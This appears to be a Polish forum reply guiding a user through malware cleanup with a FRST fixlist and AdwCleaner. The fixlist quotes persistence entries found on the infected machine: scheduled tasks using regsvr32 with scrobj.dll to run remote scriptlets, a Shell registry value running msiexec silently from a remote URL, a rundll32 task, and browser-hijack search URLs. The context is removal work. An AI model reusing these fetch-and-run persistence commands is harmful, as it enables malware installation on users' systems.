Odinstaluj Java 7 Update 71.Otwórz notatnik systemowy i wklej: HKU\S-1-5-21-1889080453-2295132588-4281077164-1007\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) <==== UWAGA ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => -> Brak pliku Task: {06F0983C-79DF-42F1-9C11-EA52D4184DB1} - System32\Tasks\{343D99F1-BE8A-4CB3-934B-BB975B522DCC} => C:\Windows\system32\pcalua.exe -a "C:\Users\Polik\Local Settings\Application Data\Bundled software uninstaller\biclient.exe" -c /initurl hxxp://bi.bisrv.com/:affid:/:sid:/:uid:? /affid uninstall /id uninstall /name "Bundled software uninstaller" Task: {0F4DA927-29FB-45A3-8D1A-D867A7D45E43} - System32\Tasks\{0A0330F4-AA5F-4934-8645-13C44D7CD276} => C:\Windows\system32\pcalua.exe -a C:\Windows\unvise32qt.exe -c C:\Windows\system32\QuickTime\Uninstall.log Task: {107119A8-B279-4ACD-B937-3CDB6C5EBBFB} - System32\Tasks\{0006F80F-4E22-41ED-96A0-078374118337} => D:\Moje dokumenty\Pulpit\settlers2\settlers2\SETUP.EXE Task: {1F6722D8-C156-4DA3-9DD0-5605EA464425} - System32\Tasks\{524A6549-DB76-4FD3-AA2D-6D63DD4B5930} => D:\Moje dokumenty\Pulpit\settlers2\settlers2\SETUP.EXE Task: {60D36AD1-AE74-4ACF-BC7D-8BA9C40C6D2A} - System32\Tasks\{2520495A-A1CC-41AB-83F3-247AC24A17E7} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\SavePass\Uninstall.exe" -c /fcp=1 Task: {6B6134E1-3356-4654-8662-C69AFD129628} - System32\Tasks\Windows-WoShiBeiYongDe => regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj81MTRQOUU8FkM5RTYcFdEdNjzYNjHcMkI4RYUxNYZSNq== scrobj.dll <==== UWAGA Task: {85D3F7DB-BD20-4DA5-82F6-1C9CFA2CBDF4} - System32\Tasks\PowerWord-SCT-JT => regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj81MTRQOUU8FkM5RTYcFdEdNjzYNjHcMkI4RYUxNYZSNq== scrobj.dll <==== UWAGA Task: {C5B00933-16EA-42D0-B972-ECEBE357364B} - System32\Tasks\{727AFD57-0F86-43F7-A65B-ED3821679021} => D:\Moje dokumenty\Pulpit\settlers2\settlers2\S2.EXE Task: {D5EBE650-E536-41A7-99A1-5DEE507679D6} - System32\Tasks\{6871F999-6937-4418-B23C-5076F5A423FC} => C:\Windows\system32\pcalua.exe -a D:\Gry\Keeper\Dk2Update130to170_English\SETUP.EXE -d D:\Gry\Keeper\Dk2Update130to170_English Task: {D865115E-313B-4E5E-AAE6-A20820CF9255} - System32\Tasks\KomputerCompromisersJunctionalV2 => rundll32.exe HominoidLustiest.dll,main 7 1 <==== UWAGA Task: {E182CDC1-FE8C-446B-BA5E-EFF5A57DCEF9} - System32\Tasks\{82CA5A97-9782-47D8-85BA-2E86CF333A44} => C:\Windows\system32\pcalua.exe -a I:\install.exe -d I:\ Shortcut: C:\Users\Komputer\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Komputer\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Komputer\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) Hosts: HKU\S-1-5-21-1889080453-2295132588-4281077164-1007\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj81MTRQOUU8FkM5RTYcFdEdNjzYNjHcMkI4RYUxNYZSNq== /q <==== UWAGA HKU\S-1-5-21-1889080453-2295132588-4281077164-1007\...\MountPoints2: H - H:\setup.exe HKU\S-1-5-21-1889080453-2295132588-4281077164-1007\...\MountPoints2: {991304cb-69aa-11e3-9c3e-806e6f6e6963} - H:\setup.exe HKU\S-1-5-21-1889080453-2295132588-4281077164-1007\...\MountPoints2: {bf01a606-2e6b-11e7-9c9b-6cf049e04e64} - H:\setup.exe HKU\S-1-5-21-1889080453-2295132588-4281077164-1007\...\MountPoints2: {de7a9041-7354-11e6-9277-6cf049e04e64} - I:\HiSuiteDownLoader.exe AppInit_DLLs: C:\PROGRA~2\SupTab\SEARCH~2.DLL => Brak pliku AppInit_DLLs-x32: C:\PROGRA~2\SupTab\SEARCH~1.DLL => Brak pliku IFEO\DisplaySwitch.exe: [Debugger] IFEO\taskmgr.exe: [Debugger] GroupPolicy: Ograniczenia ? <==== UWAGA CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = about:blank SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = FF Homepage: Mozilla\Firefox\Profiles\5r5wfe56.default -> hxxp://www.luckysearch123.com?type=hp&ts=1494511510&from=c8350511&uid=wdcxwd5000aads-00s9b0_wd-wcav9573597435974&z=c4e7716d365098e16ab202fgcz3t1z1w4gcgdwagbw FF NewTab: Mozilla\Firefox\Profiles\5r5wfe56.default -> hxxp://www.luckysearch123.com?type=hp&ts=1494511510&from=c8350511&uid=wdcxwd5000aads-00s9b0_wd-wcav9573597435974&z=c4e7716d365098e16ab202fgcz3t1z1w4gcgdwagbw FF ProfilePath: C:\Users\Komputer\AppData\Roaming\Firefox\Firefox\Profiles\5r5wfe56.default [2018-03-21] <==== UWAGA FF SearchPlugin: C:\Users\Komputer\AppData\Roaming\Firefox\Firefox\Profiles\5r5wfe56.default\searchplugins\startsearch.xml [2017-05-11] CHR HomePage: Default -> hxxp://www.luckysearch123.com?type=hp&ts=1494511510&from=c8350511&uid=wdcxwd5000aads-00s9b0_wd-wcav9573597435974&z=c4e7716d365098e16ab202fgcz3t1z1w4gcgdwagbw CHR StartupUrls: Default -> "hxxp://www.luckysearch123.com?type=hp&ts=1494511510&from=c8350511&uid=wdcxwd5000aads-00s9b0_wd-wcav9573597435974&z=c4e7716d365098e16ab202fgcz3t1z1w4gcgdwagbw" CHR DefaultSearchURL: Default -> hxxp://www.luckysearch123.com/search.php?type=ds&ts=1494511510&from=c8350511&uid=wdcxwd5000aads-00s9b0_wd-wcav9573597435974&z=c4e7716d365098e16ab202fgcz3t1z1w4gcgdwagbw&q={searchTerms} CHR DefaultSearchKeyword: Default -> luck CHR HKU\S-1-5-21-1889080453-2295132588-4281077164-1007\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [acaoakiamfeidcmgooclgeleejkbaecf] - C:\Program Files (x86)\WinToFlash Suggestor\WinToFlashSuggestor.crx CHR HKLM-x32\...\Chrome\Extension: [bpeeepmahhfjiediknjejcmcfmjcjdck] - C:\Users\Polik\AppData\Local\Google\Chrome\User Data\Default\Extensions\serach.crx CHR HKLM-x32\...\Chrome\Extension: [dkdkpmmkgdbglmfmmmmehbkmnkopingb] - C:\Users\Polik\AppData\Local\Google\Chrome\User Data\Default\Extensions\v9-toolbar.crx CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [103064 2017-05-11] () <==== UWAGA S3 ewusbmbb; system32\DRIVERS\ewusbwwan.sys [X] S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] S1 iSafeKrnl; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [X] <==== UWAGA S1 iSafeKrnlKit; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [X] <==== UWAGA S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== UWAGA S1 iSafeKrnlR3; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [X] <==== UWAGA S3 pccsmcfd; system32\DRIVERS\pccsmcfdx64.sys [X] S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X] S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X] EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom jako administrator FRST i kliknij w Fix/Napraw. Pobierz i uruchom jako administrator AdwCleaner https://toolslib.net/downloads/finish/1/ Kliknij Scan(Skanuj) i później Cleaning(Oczyść).